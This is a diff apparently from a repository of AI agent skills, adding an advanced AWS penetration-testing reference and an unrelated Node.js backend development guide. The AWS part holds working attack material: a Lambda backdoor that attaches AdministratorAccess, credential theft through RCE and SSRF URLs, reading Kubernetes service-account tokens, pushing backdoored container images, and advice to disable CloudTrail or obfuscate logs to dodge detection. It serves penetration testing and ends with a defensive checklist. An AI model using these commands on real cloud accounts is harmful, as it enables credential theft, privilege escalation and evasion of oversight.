aws sts get-caller-identity
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Troubleshooting
|
||||||
|
|
||||||
|
| Issue | Solution |
|
||||||
|
|-------|----------|
|
||||||
|
| Access Denied on all commands | Enumerate permissions with enumerate-iam |
|
||||||
|
| Metadata endpoint blocked | Check for IMDSv2, try container metadata |
|
||||||
|
| GuardDuty alerts | Use Pacu with custom user-agent |
|
||||||
|
| Expired credentials | Re-fetch from metadata (temp creds rotate) |
|
||||||
|
| CloudTrail logging actions | Consider disable or log obfuscation |
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Additional Resources
|
||||||
|
|
||||||
|
For advanced techniques including Lambda/API Gateway exploitation, Secrets Manager & KMS, Container security (ECS/EKS/ECR), RDS/DynamoDB exploitation, VPC lateral movement, and security checklists, see [references/advanced-aws-pentesting.md](references/advanced-aws-pentesting.md).
|
||||||
@@ -0,0 +1,469 @@
|
|||||||
|
# Advanced AWS Penetration Testing Reference
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
- [Training Resources](#training-resources)
|
||||||
|
- [Extended Tools Arsenal](#extended-tools-arsenal)
|
||||||
|
- [AWS API Calls That Return Credentials](#aws-api-calls-that-return-credentials)
|
||||||
|
- [Lambda & API Gateway](#lambda--api-gateway)
|
||||||
|
- [Secrets Manager & KMS](#secrets-manager--kms)
|
||||||
|
- [Container Security (ECS/EKS/ECR)](#container-security-ecseksecr)
|
||||||
|
- [RDS Database Exploitation](#rds-database-exploitation)
|
||||||
|
- [DynamoDB Exploitation](#dynamodb-exploitation)
|
||||||
|
- [VPC Enumeration & Lateral Movement](#vpc-enumeration--lateral-movement)
|
||||||
|
- [Security Checklist](#security-checklist)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Training Resources
|
||||||
|
|
||||||
|
| Resource | Description | URL |
|
||||||
|
|----------|-------------|-----|
|
||||||
|
| AWSGoat | Damn Vulnerable AWS Infrastructure | github.com/ine-labs/AWSGoat |
|
||||||
|
| Cloudgoat | AWS CTF-style scenario | github.com/RhinoSecurityLabs/cloudgoat |
|
||||||
|
| Flaws | AWS security challenge | flaws.cloud |
|
||||||
|
| SadCloud | Terraform for vuln AWS | github.com/nccgroup/sadcloud |
|
||||||
|
| DVCA | Vulnerable Cloud App | medium.com/poka-techblog |
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Extended Tools Arsenal
|
||||||
|
|
||||||
|
### weirdAAL - AWS Attack Library
|
||||||
|
```bash
|
||||||
|
python3 weirdAAL.py -m ec2_describe_instances -t demo
|
||||||
|
python3 weirdAAL.py -m lambda_get_account_settings -t demo
|
||||||
|
python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2'
|
||||||
|
```
|
||||||
|
|
||||||
|
### cloudmapper - AWS Environment Analyzer
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/duo-labs/cloudmapper.git
|
||||||
|
pipenv install --skip-lock
|
||||||
|
pipenv shell
|
||||||
|
|
||||||
|
# Commands
|
||||||
|
report # Generate HTML report
|
||||||
|
iam_report # IAM-specific report
|
||||||
|
audit # Check misconfigurations
|
||||||
|
collect # Collect account metadata
|
||||||
|
find_admins # Identify admin users/roles
|
||||||
|
```
|
||||||
|
|
||||||
|
### cloudsplaining - IAM Security Assessment
|
||||||
|
```bash
|
||||||
|
pip3 install --user cloudsplaining
|
||||||
|
cloudsplaining download --profile myawsprofile
|
||||||
|
cloudsplaining scan --input-file default.json
|
||||||
|
```
|
||||||
|
|
||||||
|
### s3_objects_check - S3 Object Permissions
|
||||||
|
```bash
|
||||||
|
git clone https://github.com/nccgroup/s3_objects_check
|
||||||
|
python s3-objects-check.py -p whitebox-profile -e blackbox-profile
|
||||||
|
```
|
||||||
|
|
||||||
|
### dufflebag - Find EBS Secrets
|
||||||
|
```bash
|
||||||
|
# Finds secrets exposed via Amazon EBS's "public" mode
|
||||||
|
git clone https://github.com/BishopFox/dufflebag
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## AWS API Calls That Return Credentials
|
||||||
|
|
||||||
|
| API Call | Description |
|
||||||
|
|----------|-------------|
|
||||||
|
| `chime:createapikey` | Create API key |
|
||||||
|
| `codepipeline:pollforjobs` | Poll for jobs |
|
||||||
|
| `cognito-identity:getopenidtoken` | Get OpenID token |
|
||||||
|
| `cognito-identity:getcredentialsforidentity` | Get identity credentials |
|
||||||
|
| `connect:getfederationtoken` | Get federation token |
|
||||||
|
| `ecr:getauthorizationtoken` | ECR auth token |
|
||||||
|
| `gamelift:requestuploadcredentials` | GameLift upload creds |
|
||||||
|
| `iam:createaccesskey` | Create access key |
|
||||||
|
| `iam:createloginprofile` | Create login profile |
|
||||||
|
| `iam:createservicespecificcredential` | Service-specific creds |
|
||||||
|
| `lightsail:getinstanceaccessdetails` | Instance access details |
|
||||||
|
| `lightsail:getrelationaldatabasemasteruserpassword` | DB master password |
|
||||||
|
| `rds-db:connect` | RDS connect |
|
||||||
|
| `redshift:getclustercredentials` | Redshift credentials |
|
||||||
|
| `sso:getrolecredentials` | SSO role credentials |
|
||||||
|
| `sts:assumerole` | Assume role |
|
||||||
|
| `sts:assumerolewithsaml` | Assume role with SAML |
|
||||||
|
| `sts:assumerolewithwebidentity` | Web identity assume |
|
||||||
|
| `sts:getfederationtoken` | Federation token |
|
||||||
|
| `sts:getsessiontoken` | Session token |
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Lambda & API Gateway
|
||||||
|
|
||||||
|
### Lambda Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List all lambda functions
|
||||||
|
aws lambda list-functions
|
||||||
|
|
||||||
|
# Get function details and download code
|
||||||
|
aws lambda get-function --function-name FUNCTION_NAME
|
||||||
|
wget -O lambda-function.zip "url-from-previous-query"
|
||||||
|
|
||||||
|
# Get function policy
|
||||||
|
aws lambda get-policy --function-name FUNCTION_NAME
|
||||||
|
|
||||||
|
# List event source mappings
|
||||||
|
aws lambda list-event-source-mappings --function-name FUNCTION_NAME
|
||||||
|
|
||||||
|
# List Lambda layers (dependencies)
|
||||||
|
aws lambda list-layers
|
||||||
|
aws lambda get-layer-version --layer-name NAME --version-number VERSION
|
||||||
|
```
|
||||||
|
|
||||||
|
### API Gateway Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List REST APIs
|
||||||
|
aws apigateway get-rest-apis
|
||||||
|
|
||||||
|
# Get specific API info
|
||||||
|
aws apigateway get-rest-api --rest-api-id ID
|
||||||
|
|
||||||
|
# List endpoints (resources)
|
||||||
|
aws apigateway get-resources --rest-api-id ID
|
||||||
|
|
||||||
|
# Get method info
|
||||||
|
aws apigateway get-method --rest-api-id ID --resource-id RES_ID --http-method GET
|
||||||
|
|
||||||
|
# List API versions (stages)
|
||||||
|
aws apigateway get-stages --rest-api-id ID
|
||||||
|
|
||||||
|
# List API keys
|
||||||
|
aws apigateway get-api-keys --include-values
|
||||||
|
```
|
||||||
|
|
||||||
|
### Lambda Credential Access
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Via RCE - get environment variables
|
||||||
|
https://apigateway/prod/system?cmd=env
|
||||||
|
|
||||||
|
# Via SSRF - access runtime API
|
||||||
|
https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/
|
||||||
|
|
||||||
|
# Via file read
|
||||||
|
https://apigateway/prod/system?cmd=file:///proc/self/environ
|
||||||
|
```
|
||||||
|
|
||||||
|
### Lambda Backdooring
|
||||||
|
|
||||||
|
```python
|
||||||
|
# Malicious Lambda code to escalate privileges
|
||||||
|
import boto3
|
||||||
|
import json
|
||||||
|
|
||||||
|
def handler(event, context):
|
||||||
|
iam = boto3.client("iam")
|
||||||
|
iam.attach_role_policy(
|
||||||
|
RoleName="role_name",
|
||||||
|
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
|
||||||
|
)
|
||||||
|
iam.attach_user_policy(
|
||||||
|
UserName="user_name",
|
||||||
|
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
|
||||||
|
)
|
||||||
|
return {'statusCode': 200, 'body': json.dumps("Pwned")}
|
||||||
|
```
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Update function with backdoor
|
||||||
|
aws lambda update-function-code --function-name NAME --zip-file fileb://backdoor.zip
|
||||||
|
|
||||||
|
# Invoke backdoored function
|
||||||
|
curl https://API_ID.execute-api.REGION.amazonaws.com/STAGE/ENDPOINT
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Secrets Manager & KMS
|
||||||
|
|
||||||
|
### Secrets Manager Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List all secrets
|
||||||
|
aws secretsmanager list-secrets
|
||||||
|
|
||||||
|
# Describe specific secret
|
||||||
|
aws secretsmanager describe-secret --secret-id NAME
|
||||||
|
|
||||||
|
# Get resource policy
|
||||||
|
aws secretsmanager get-resource-policy --secret-id ID
|
||||||
|
|
||||||
|
# Retrieve secret value
|
||||||
|
aws secretsmanager get-secret-value --secret-id ID
|
||||||
|
```
|
||||||
|
|
||||||
|
### KMS Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List KMS keys
|
||||||
|
aws kms list-keys
|
||||||
|
|
||||||
|
# Describe key
|
||||||
|
aws kms describe-key --key-id ID
|
||||||
|
|
||||||
|
# List key policies
|
||||||
|
aws kms list-key-policies --key-id ID
|
||||||
|
|
||||||
|
# Get full policy
|
||||||
|
aws kms get-key-policy --policy-name NAME --key-id ID
|
||||||
|
```
|
||||||
|
|
||||||
|
### KMS Decryption
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Decrypt file (key info embedded in ciphertext)
|
||||||
|
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query plaintext
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Container Security (ECS/EKS/ECR)
|
||||||
|
|
||||||
|
### ECR Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List repositories
|
||||||
|
aws ecr describe-repositories
|
||||||
|
|
||||||
|
# Get repository policy
|
||||||
|
aws ecr get-repository-policy --repository-name NAME
|
||||||
|
|
||||||
|
# List images
|
||||||
|
aws ecr list-images --repository-name NAME
|
||||||
|
|
||||||
|
# Describe image
|
||||||
|
aws ecr describe-images --repository-name NAME --image-ids imageTag=TAG
|
||||||
|
```
|
||||||
|
|
||||||
|
### ECS Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List clusters
|
||||||
|
aws ecs list-clusters
|
||||||
|
|
||||||
|
# Describe cluster
|
||||||
|
aws ecs describe-clusters --cluster NAME
|
||||||
|
|
||||||
|
# List services
|
||||||
|
aws ecs list-services --cluster NAME
|
||||||
|
|
||||||
|
# Describe service
|
||||||
|
aws ecs describe-services --cluster NAME --services SERVICE
|
||||||
|
|
||||||
|
# List tasks
|
||||||
|
aws ecs list-tasks --cluster NAME
|
||||||
|
|
||||||
|
# Describe task (shows network info for pivoting)
|
||||||
|
aws ecs describe-tasks --cluster NAME --tasks TASK_ARN
|
||||||
|
|
||||||
|
# List container instances
|
||||||
|
aws ecs list-container-instances --cluster NAME
|
||||||
|
```
|
||||||
|
|
||||||
|
### EKS Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List EKS clusters
|
||||||
|
aws eks list-clusters
|
||||||
|
|
||||||
|
# Describe cluster
|
||||||
|
aws eks describe-cluster --name NAME
|
||||||
|
|
||||||
|
# List node groups
|
||||||
|
aws eks list-nodegroups --cluster-name NAME
|
||||||
|
|
||||||
|
# Describe node group
|
||||||
|
aws eks describe-nodegroup --cluster-name NAME --nodegroup-name NODE_NAME
|
||||||
|
|
||||||
|
# List Fargate profiles
|
||||||
|
aws eks list-fargate-profiles --cluster-name NAME
|
||||||
|
```
|
||||||
|
|
||||||
|
### Container Backdooring
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Authenticate Docker to ECR
|
||||||
|
aws ecr get-login-password --region REGION | docker login --username AWS --password-stdin ECR_ADDR
|
||||||
|
|
||||||
|
# Build backdoored image
|
||||||
|
docker build -t image_name .
|
||||||
|
|
||||||
|
# Tag for ECR
|
||||||
|
docker tag image_name ECR_ADDR:IMAGE_NAME
|
||||||
|
|
||||||
|
# Push to ECR
|
||||||
|
docker push ECR_ADDR:IMAGE_NAME
|
||||||
|
```
|
||||||
|
|
||||||
|
### EKS Secrets via RCE
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List Kubernetes secrets
|
||||||
|
https://website.com/rce.php?cmd=ls /var/run/secrets/kubernetes.io/serviceaccount
|
||||||
|
|
||||||
|
# Get service account token
|
||||||
|
https://website.com/rce.php?cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## RDS Database Exploitation
|
||||||
|
|
||||||
|
### RDS Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List RDS clusters
|
||||||
|
aws rds describe-db-clusters
|
||||||
|
|
||||||
|
# List RDS instances
|
||||||
|
aws rds describe-db-instances
|
||||||
|
# Check: IAMDatabaseAuthenticationEnabled: false = password auth
|
||||||
|
|
||||||
|
# List subnet groups
|
||||||
|
aws rds describe-db-subnet-groups
|
||||||
|
|
||||||
|
# List security groups
|
||||||
|
aws rds describe-db-security-groups
|
||||||
|
|
||||||
|
# List proxies
|
||||||
|
aws rds describe-db-proxies
|
||||||
|
```
|
||||||
|
|
||||||
|
### Password-Based Access
|
||||||
|
|
||||||
|
```bash
|
||||||
|
mysql -h HOSTNAME -u USERNAME -P PORT -p
|
||||||
|
```
|
||||||
|
|
||||||
|
### IAM-Based Access
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Generate auth token
|
||||||
|
TOKEN=$(aws rds generate-db-auth-token \
|
||||||
|
--hostname HOSTNAME \
|
||||||
|
--port PORT \
|
||||||
|
--username USERNAME \
|
||||||
|
--region REGION)
|
||||||
|
|
||||||
|
# Connect with token
|
||||||
|
mysql -h HOSTNAME -u USERNAME -P PORT \
|
||||||
|
--enable-cleartext-plugin --password=$TOKEN
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## DynamoDB Exploitation
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List tables
|
||||||
|
aws dynamodb list-tables
|
||||||
|
|
||||||
|
# Scan table contents
|
||||||
|
aws dynamodb scan --table-name TABLE_NAME | jq -r '.Items[]'
|
||||||
|
|
||||||
|
# Query specific items
|
||||||
|
aws dynamodb query --table-name TABLE_NAME \
|
||||||
|
--key-condition-expression "pk = :pk" \
|
||||||
|
--expression-attribute-values '{":pk":{"S":"user"}}'
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## VPC Enumeration & Lateral Movement
|
||||||
|
|
||||||
|
### VPC Enumeration
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List VPCs
|
||||||
|
aws ec2 describe-vpcs
|
||||||
|
|
||||||
|
# List subnets
|
||||||
|
aws ec2 describe-subnets --filters "Name=vpc-id,Values=VPC_ID"
|
||||||
|
|
||||||
|
# List route tables
|
||||||
|
aws ec2 describe-route-tables --filters "Name=vpc-id,Values=VPC_ID"
|
||||||
|
|
||||||
|
# List Network ACLs
|
||||||
|
aws ec2 describe-network-acls
|
||||||
|
|
||||||
|
# List VPC peering connections
|
||||||
|
aws ec2 describe-vpc-peering-connections
|
||||||
|
```
|
||||||
|
|
||||||
|
### Route Table Targets
|
||||||
|
|
||||||
|
| Destination | Target | Description |
|
||||||
|
|-------------|--------|-------------|
|
||||||
|
| IP | `local` | VPC internal |
|
||||||
|
| IP | `igw` | Internet Gateway |
|
||||||
|
| IP | `nat` | NAT Gateway |
|
||||||
|
| IP | `pcx` | VPC Peering |
|
||||||
|
| IP | `vpce` | VPC Endpoint |
|
||||||
|
| IP | `vgw` | VPN Gateway |
|
||||||
|
| IP | `eni` | Network Interface |
|
||||||
|
|
||||||
|
### Lateral Movement via VPC Peering
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# List peering connections
|
||||||
|
aws ec2 describe-vpc-peering-connections
|
||||||
|
|
||||||
|
# List instances in target VPC
|
||||||
|
aws ec2 describe-instances --filters "Name=vpc-id,Values=VPC_ID"
|
||||||
|
|
||||||
|
# List instances in specific subnet
|
||||||
|
aws ec2 describe-instances --filters "Name=subnet-id,Values=SUBNET_ID"
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Security Checklist
|
||||||
|
|
||||||
|
### Identity and Access Management
|
||||||
|
- [ ] Avoid use of root account
|
||||||
|
- [ ] MFA enabled for all IAM users with console access
|
||||||
|
- [ ] Disable credentials unused for 90+ days
|
||||||
|
- [ ] Rotate access keys every 90 days
|
||||||
|
- [ ] Password policy: uppercase, lowercase, symbol, number, 14+ chars
|
||||||
|
- [ ] No root access keys exist
|
||||||
|
- [ ] MFA enabled for root account
|
||||||
|
- [ ] IAM policies attached to groups/roles only
|
||||||
|
|
||||||
|
### Logging
|
||||||
|
- [ ] CloudTrail enabled in all regions
|
||||||
|
- [ ] CloudTrail log file validation enabled
|
||||||
|
- [ ] CloudTrail S3 bucket not publicly accessible
|
||||||
|
- [ ] CloudTrail integrated with CloudWatch Logs
|
||||||
|
- [ ] AWS Config enabled in all regions
|
||||||
|
- [ ] CloudTrail logs encrypted with KMS
|
||||||
|
- [ ] KMS key rotation enabled
|
||||||
|
|
||||||
|
### Networking
|
||||||
|
- [ ] No security groups allow 0.0.0.0/0 to port 22
|
||||||
|
- [ ] No security groups allow 0.0.0.0/0 to port 3389
|
||||||
|
- [ ] VPC flow logging enabled
|
||||||
|
- [ ] Default security group restricts all traffic
|
||||||
|
|
||||||
|
### Monitoring
|
||||||
|
- [ ] Alarm for unauthorized API calls
|
||||||
|
- [ ] Alarm for console sign-in without MFA
|
||||||
|
- [ ] Alarm for root account usage
|
||||||
|
- [ ] Alarm for IAM policy changes
|
||||||
|
- [ ] Alarm for CloudTrail config changes
|
||||||
|
- [ ] Alarm for console auth failures
|
||||||
|
- [ ] Alarm for CMK disabling/deletion
|
||||||
|
- [ ] Alarm for S3 bucket policy changes
|
||||||
|
- [ ] Alarm for security group changes
|
||||||
|
- [ ] Alarm for NACL changes
|
||||||
|
- [ ] Alarm for VPC changes
|
||||||
302
skills/backend-dev-guidelines/SKILL.md
Normal file
302
skills/backend-dev-guidelines/SKILL.md
Normal file
@@ -0,0 +1,302 @@
|
|||||||
|
---
|
||||||
|
name: backend-dev-guidelines
|
||||||
|
description: Comprehensive backend development guide for Node.js/Express/TypeScript microservices. Use when creating routes, controllers, services, repositories, middleware, or working with Express APIs, Prisma database access, Sentry error tracking, Zod validation, unifiedConfig, dependency injection, or async patterns. Covers layered architecture (routes → controllers → services → repositories), BaseController pattern, error handling, performance monitoring, testing strategies, and migration from legacy patterns.
|
||||||
|
---
|
||||||
|
|
||||||
|
# Backend Development Guidelines
|
||||||
|
|
||||||
|
## Purpose
|
||||||
|
|
||||||
|
Establish consistency and best practices across backend microservices (blog-api, auth-service, notifications-service) using modern Node.js/Express/TypeScript patterns.
|
||||||
|
|
||||||
|
## When to Use This Skill
|
||||||
|
|
||||||
|
Automatically activates when working on:
|
||||||
|
- Creating or modifying routes, endpoints, APIs
|
||||||
|
- Building controllers, services, repositories
|
||||||
|
- Implementing middleware (auth, validation, error handling)
|
||||||
|
- Database operations with Prisma
|
||||||
|
- Error tracking with Sentry
|
||||||
|
- Input validation with Zod
|
||||||
|
- Configuration management
|
||||||
|
- Backend testing and refactoring
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Quick Start
|
||||||
|
|
||||||
|
### New Backend Feature Checklist
|
||||||
|
|
||||||
|
- [ ] **Route**: Clean definition, delegate to controller
|
||||||
|
- [ ] **Controller**: Extend BaseController
|
||||||
|
- [ ] **Service**: Business logic with DI
|
||||||
|
- [ ] **Repository**: Database access (if complex)
|
||||||
|
- [ ] **Validation**: Zod schema
|
||||||
|
- [ ] **Sentry**: Error tracking
|
||||||
|
- [ ] **Tests**: Unit + integration tests
|
||||||
|
- [ ] **Config**: Use unifiedConfig
|
||||||
|
|
||||||
|
### New Microservice Checklist
|
||||||
|
|
||||||
|
- [ ] Directory structure (see [architecture-overview.md](architecture-overview.md))
|
||||||
|
- [ ] instrument.ts for Sentry
|
||||||
|
- [ ] unifiedConfig setup
|
||||||
|
- [ ] BaseController class
|
||||||
|
- [ ] Middleware stack
|
||||||
|
- [ ] Error boundary
|
||||||
|
- [ ] Testing framework
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Architecture Overview
|
||||||
|
|
||||||
|
### Layered Architecture
|
||||||
|
|
||||||
|
```
|
||||||
|
HTTP Request
|
||||||
|
↓
|
||||||
|
Routes (routing only)
|
||||||
|
↓
|
||||||
|
Controllers (request handling)
|
||||||
|
↓
|
||||||
|
Services (business logic)
|
||||||
|
↓
|
||||||
|
Repositories (data access)
|
||||||
|
↓
|
||||||
|
Database (Prisma)
|
||||||
|
```
|
||||||
|
|
||||||
|
**Key Principle:** Each layer has ONE responsibility.
|
||||||
|
|
||||||
|
See [architecture-overview.md](architecture-overview.md) for complete details.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Directory Structure
|
||||||
|
|
||||||
|
```
|
||||||
|
service/src/
|
||||||
|
├── config/ # UnifiedConfig
|
||||||
|
├── controllers/ # Request handlers
|
||||||
|
├── services/ # Business logic
|
||||||
|
├── repositories/ # Data access
|
||||||
|
├── routes/ # Route definitions
|
||||||
|
├── middleware/ # Express middleware
|
||||||
|
├── types/ # TypeScript types
|
||||||
|
├── validators/ # Zod schemas
|
||||||
|
├── utils/ # Utilities
|
||||||
|
├── tests/ # Tests
|
||||||
|
├── instrument.ts # Sentry (FIRST IMPORT)
|
||||||
|
├── app.ts # Express setup
|
||||||
|
└── server.ts # HTTP server
|
||||||
|
```
|
||||||
|
|
||||||
|
**Naming Conventions:**
|
||||||
|
- Controllers: `PascalCase` - `UserController.ts`
|
||||||
|
- Services: `camelCase` - `userService.ts`
|
||||||
|
- Routes: `camelCase + Routes` - `userRoutes.ts`
|
||||||
|
- Repositories: `PascalCase + Repository` - `UserRepository.ts`
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Core Principles (7 Key Rules)
|
||||||
|
|
||||||
|
### 1. Routes Only Route, Controllers Control
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ NEVER: Business logic in routes
|
||||||
|
router.post('/submit', async (req, res) => {
|
||||||
|
// 200 lines of logic
|
||||||
|
});
|
||||||
|
|
||||||
|
// ✅ ALWAYS: Delegate to controller
|
||||||
|
router.post('/submit', (req, res) => controller.submit(req, res));
|
||||||
|
```
|
||||||
|
|
||||||
|
### 2. All Controllers Extend BaseController
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
export class UserController extends BaseController {
|
||||||
|
async getUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const user = await this.userService.findById(req.params.id);
|
||||||
|
this.handleSuccess(res, user);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'getUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### 3. All Errors to Sentry
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
try {
|
||||||
|
await operation();
|
||||||
|
} catch (error) {
|
||||||
|
Sentry.captureException(error);
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### 4. Use unifiedConfig, NEVER process.env
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ NEVER
|
||||||
|
const timeout = process.env.TIMEOUT_MS;
|
||||||
|
|
||||||
|
// ✅ ALWAYS
|
||||||
|
import { config } from './config/unifiedConfig';
|
||||||
|
const timeout = config.timeouts.default;
|
||||||
|
```
|
||||||
|
|
||||||
|
### 5. Validate All Input with Zod
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
const schema = z.object({ email: z.string().email() });
|
||||||
|
const validated = schema.parse(req.body);
|
||||||
|
```
|
||||||
|
|
||||||
|
### 6. Use Repository Pattern for Data Access
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Service → Repository → Database
|
||||||
|
const users = await userRepository.findActive();
|
||||||
|
```
|
||||||
|
|
||||||
|
### 7. Comprehensive Testing Required
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
describe('UserService', () => {
|
||||||
|
it('should create user', async () => {
|
||||||
|
expect(user).toBeDefined();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Common Imports
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// Express
|
||||||
|
import express, { Request, Response, NextFunction, Router } from 'express';
|
||||||
|
|
||||||
|
// Validation
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
// Database
|
||||||
|
import { PrismaClient } from '@prisma/client';
|
||||||
|
import type { Prisma } from '@prisma/client';
|
||||||
|
|
||||||
|
// Sentry
|
||||||
|
import * as Sentry from '@sentry/node';
|
||||||
|
|
||||||
|
// Config
|
||||||
|
import { config } from './config/unifiedConfig';
|
||||||
|
|
||||||
|
// Middleware
|
||||||
|
import { SSOMiddlewareClient } from './middleware/SSOMiddleware';
|
||||||
|
import { asyncErrorWrapper } from './middleware/errorBoundary';
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Quick Reference
|
||||||
|
|
||||||
|
### HTTP Status Codes
|
||||||
|
|
||||||
|
| Code | Use Case |
|
||||||
|
|------|----------|
|
||||||
|
| 200 | Success |
|
||||||
|
| 201 | Created |
|
||||||
|
| 400 | Bad Request |
|
||||||
|
| 401 | Unauthorized |
|
||||||
|
| 403 | Forbidden |
|
||||||
|
| 404 | Not Found |
|
||||||
|
| 500 | Server Error |
|
||||||
|
|
||||||
|
### Service Templates
|
||||||
|
|
||||||
|
**Blog API** (✅ Mature) - Use as template for REST APIs
|
||||||
|
**Auth Service** (✅ Mature) - Use as template for authentication patterns
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Anti-Patterns to Avoid
|
||||||
|
|
||||||
|
❌ Business logic in routes
|
||||||
|
❌ Direct process.env usage
|
||||||
|
❌ Missing error handling
|
||||||
|
❌ No input validation
|
||||||
|
❌ Direct Prisma everywhere
|
||||||
|
❌ console.log instead of Sentry
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Navigation Guide
|
||||||
|
|
||||||
|
| Need to... | Read this |
|
||||||
|
|------------|-----------|
|
||||||
|
| Understand architecture | [architecture-overview.md](architecture-overview.md) |
|
||||||
|
| Create routes/controllers | [routing-and-controllers.md](routing-and-controllers.md) |
|
||||||
|
| Organize business logic | [services-and-repositories.md](services-and-repositories.md) |
|
||||||
|
| Validate input | [validation-patterns.md](validation-patterns.md) |
|
||||||
|
| Add error tracking | [sentry-and-monitoring.md](sentry-and-monitoring.md) |
|
||||||
|
| Create middleware | [middleware-guide.md](middleware-guide.md) |
|
||||||
|
| Database access | [database-patterns.md](database-patterns.md) |
|
||||||
|
| Manage config | [configuration.md](configuration.md) |
|
||||||
|
| Handle async/errors | [async-and-errors.md](async-and-errors.md) |
|
||||||
|
| Write tests | [testing-guide.md](testing-guide.md) |
|
||||||
|
| See examples | [complete-examples.md](complete-examples.md) |
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Resource Files
|
||||||
|
|
||||||
|
### [architecture-overview.md](architecture-overview.md)
|
||||||
|
Layered architecture, request lifecycle, separation of concerns
|
||||||
|
|
||||||
|
### [routing-and-controllers.md](routing-and-controllers.md)
|
||||||
|
Route definitions, BaseController, error handling, examples
|
||||||
|
|
||||||
|
### [services-and-repositories.md](services-and-repositories.md)
|
||||||
|
Service patterns, DI, repository pattern, caching
|
||||||
|
|
||||||
|
### [validation-patterns.md](validation-patterns.md)
|
||||||
|
Zod schemas, validation, DTO pattern
|
||||||
|
|
||||||
|
### [sentry-and-monitoring.md](sentry-and-monitoring.md)
|
||||||
|
Sentry init, error capture, performance monitoring
|
||||||
|
|
||||||
|
### [middleware-guide.md](middleware-guide.md)
|
||||||
|
Auth, audit, error boundaries, AsyncLocalStorage
|
||||||
|
|
||||||
|
### [database-patterns.md](database-patterns.md)
|
||||||
|
PrismaService, repositories, transactions, optimization
|
||||||
|
|
||||||
|
### [configuration.md](configuration.md)
|
||||||
|
UnifiedConfig, environment configs, secrets
|
||||||
|
|
||||||
|
### [async-and-errors.md](async-and-errors.md)
|
||||||
|
Async patterns, custom errors, asyncErrorWrapper
|
||||||
|
|
||||||
|
### [testing-guide.md](testing-guide.md)
|
||||||
|
Unit/integration tests, mocking, coverage
|
||||||
|
|
||||||
|
### [complete-examples.md](complete-examples.md)
|
||||||
|
Full examples, refactoring guide
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Related Skills
|
||||||
|
|
||||||
|
- **database-verification** - Verify column names and schema consistency
|
||||||
|
- **error-tracking** - Sentry integration patterns
|
||||||
|
- **skill-developer** - Meta-skill for creating and managing skills
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Skill Status**: COMPLETE ✅
|
||||||
|
**Line Count**: < 500 ✅
|
||||||
|
**Progressive Disclosure**: 11 resource files ✅
|
||||||
451
skills/backend-dev-guidelines/resources/architecture-overview.md
Normal file
451
skills/backend-dev-guidelines/resources/architecture-overview.md
Normal file
